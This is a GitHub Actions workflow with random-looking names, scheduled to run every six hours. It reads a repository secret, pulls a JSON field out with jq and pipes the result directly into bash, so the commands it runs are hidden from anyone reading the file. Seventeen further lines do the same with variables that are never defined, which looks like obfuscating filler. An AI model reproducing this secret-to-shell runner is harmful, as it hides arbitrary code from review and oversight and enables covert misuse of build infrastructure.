name: obviousgameg

on:
  workflow_dispatch:
  schedule:
    - cron: '26 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: obviousgameg
        env:
          an6973: ${{ secrets.an6973 }}
        run: |
          echo $an6973 | jq -r .vpkk627 | /bin/bash
          echo $src90370 | jq -r .i58359 | /bin/bash
          echo $l761 | jq -r .rptjm13 | /bin/bash
          echo $tafsi75686 | jq -r .dajbp33 | /bin/bash
          echo $mahje324 | jq -r .lfu1 | /bin/bash
          echo $zw8 | jq -r .zq12332 | /bin/bash
          echo $vjie710 | jq -r .fo187 | /bin/bash
          echo $mvvi27210 | jq -r .b36 | /bin/bash
          echo $iwdtu731 | jq -r .xyrso29349 | /bin/bash
          echo $zdvkd78 | jq -r .j559 | /bin/bash
          echo $bc97402 | jq -r .hmago452 | /bin/bash
          echo $un3212 | jq -r .tk29 | /bin/bash
          echo $s6 | jq -r .dnw3593 | /bin/bash
          echo $ik55199 | jq -r .cif39635 | /bin/bash
          echo $cr136 | jq -r .bqyaf17785 | /bin/bash
          echo $vboc6 | jq -r .d6774 | /bin/bash
          echo $t127 | jq -r .fmk42644 | /bin/bash
          echo $jjid2612 | jq -r .vz2 | /bin/bash

